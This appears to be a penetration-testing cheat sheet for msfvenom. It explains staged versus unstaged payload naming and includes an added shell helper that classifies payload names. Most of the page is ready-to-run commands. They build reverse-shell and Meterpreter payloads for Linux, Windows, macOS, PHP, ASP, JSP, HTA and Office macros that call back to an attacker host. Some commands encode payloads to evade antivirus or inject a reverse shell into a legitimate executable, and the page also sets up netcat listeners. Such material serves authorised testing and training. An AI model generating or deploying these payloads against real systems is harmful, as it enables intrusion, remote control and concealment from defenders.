msfvenom generates (and optionally encodes) payloads. Part of the Metasploit Framework.
See also Meterpreter and Metasploit.
List modules
Encoders
msfvenom -l encoders
Output formats
msfvenom -l formats
Client-side formats:
- HTML Application: hta-psh
- Microsoft Office macro: vba, vba-psh
Payloads
msfvenom -l payloads
Platforms
msfvenom -l platforms
Generating a reverse shell payload
Reverse shell cheat sheets:
Naming convention: windows/shell_reverse_tcp (unstaged: the entire payload in one binary) vs windows/shell/reverse_tcp (staged: a small stager that connects back and fetches the rest of the payload, the stage, from the handler). A slash between stage and stager means staged; an underscore means unstaged.
Staged payloads don't work with netcat, because netcat cannot send the stage! You must use Metasploit's exploit/multi/handler module. Staged payloads are better at antivirus evasion.
KALI_IP=x.x.x.x
LISTENER_PORT=4444
LHOST can also be the name of a network interface, e.g. LHOST=tun0 (msfvenom resolves it to that interface's address).
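Added example (not from the original page or from Metasploit): a POSIX shell helper that applies the naming rule above to decide whether a payload name is staged (multi/handler only) or unstaged (netcat works). The list of stage names it recognises is my own assumption and covers only the common stages.

```sh
#!/bin/sh
# Added helper (not part of msfvenom): apply the staged/unstaged naming rule.
# A staged payload lists its stage and stager as two path components
# ("meterpreter/reverse_tcp"); a single, unstaged payload joins them with
# an underscore ("meterpreter_reverse_tcp", "shell_reverse_tcp").

# payload_kind NAME  -> prints "staged" or "unstaged"
payload_kind() {
    _stager=${1##*/}                 # last component, e.g. reverse_tcp
    _rest=${1%/*}
    _stage=${_rest##*/}              # component before it, e.g. meterpreter
    case "$_stager" in
        reverse_*|bind_*) ;;         # looks like a stager name; now check the stage
        *) echo unstaged; return 0 ;;
    esac
    # Stage names recognised here (assumption: the common ones only).
    # Anything else, e.g. cmd/unix/reverse_bash, is a single payload.
    case "$_stage" in
        meterpreter|shell|vncinject|dllinject|powershell|upexec) echo staged ;;
        *) echo unstaged ;;
    esac
}

# listener_for NAME -> which listener can catch the connection
listener_for() {
    if [ "$(payload_kind "$1")" = staged ]; then
        echo "exploit/multi/handler only (netcat cannot send the stage)"
    else
        echo "netcat (nc -lnvp PORT) or exploit/multi/handler"
    fi
}

# Demo with names from this page plus two extra variants
for p in windows/shell_reverse_tcp windows/shell/reverse_tcp \
         windows/meterpreter_reverse_http windows/meterpreter/reverse_http \
         windows/x64/meterpreter/reverse_https cmd/unix/reverse_bash; do
    printf '%-40s %-9s %s\n' "$p" "$(payload_kind "$p")" "$(listener_for "$p")"
done
```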
Meterpreter
Linux (staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > linux_shell.elf
Windows (staged)
EXE files must be transferred in binary mode (e.g. FTP "binary"), or the executable will be corrupted.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > windows_shell.exe
Windows HTTP payload (unstaged)
payload/windows/meterpreter_reverse_http
Windows HTTP payload (staged)
payload/windows/meterpreter/reverse_http
Mac OS
msfvenom -p osx/x86/meterpreter/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f macho > mac_shell.macho
PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.php
ASP
Useful web shell (not msfvenom): /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f asp > asp_shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f aspx > reverse.aspx
Not Meterpreter
Netcat listener for shell_reverse_tcp (unstaged); sudo is only needed for ports below 1024 (e.g. 443)
sudo nc -lnvp $LISTENER_PORT
Linux binary – Staged (exploit/multi/handler only)
msfvenom -p linux/x86/shell/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > myprecious.elf
Linux binary – Unstaged
Listener: the netcat listener above.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > myprecious.elf
Raw Windows PE reverse shell executable – Unstaged (entire payload)
EXE files must be transferred in binary mode.
Listener: the netcat listener above.
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > myprecious.exe
Encoded Windows PE reverse shell executable – Unstaged (entire payload)
-e: encoder to use; -i: number of encoding iterations. Iterated shikata_ga_nai encoding does not evade antivirus detection anymore 🙁
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -o myprecious.exe
Inject encoded Windows reverse shell into an existing PE file (-x: use the given executable as template)
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe
Windows reverse shell, HTA + PowerShell (sudo only because the output goes to /var/www/html)
sudo msfvenom -p windows/shell_reverse_tcp LHOST=${KALI_IP} LPORT=${LISTENER_PORT} -f hta-psh -o /var/www/html/poc_hta.hta
Microsoft Office macros: use -f vba or -f vba-psh (see Output formats above)
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > jsp_shell.jsp
Generating payloads from msfconsole (the generate command takes the same options as msfvenom)
msfconsole -q
use payload/windows/shell_reverse_tcp
generate LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe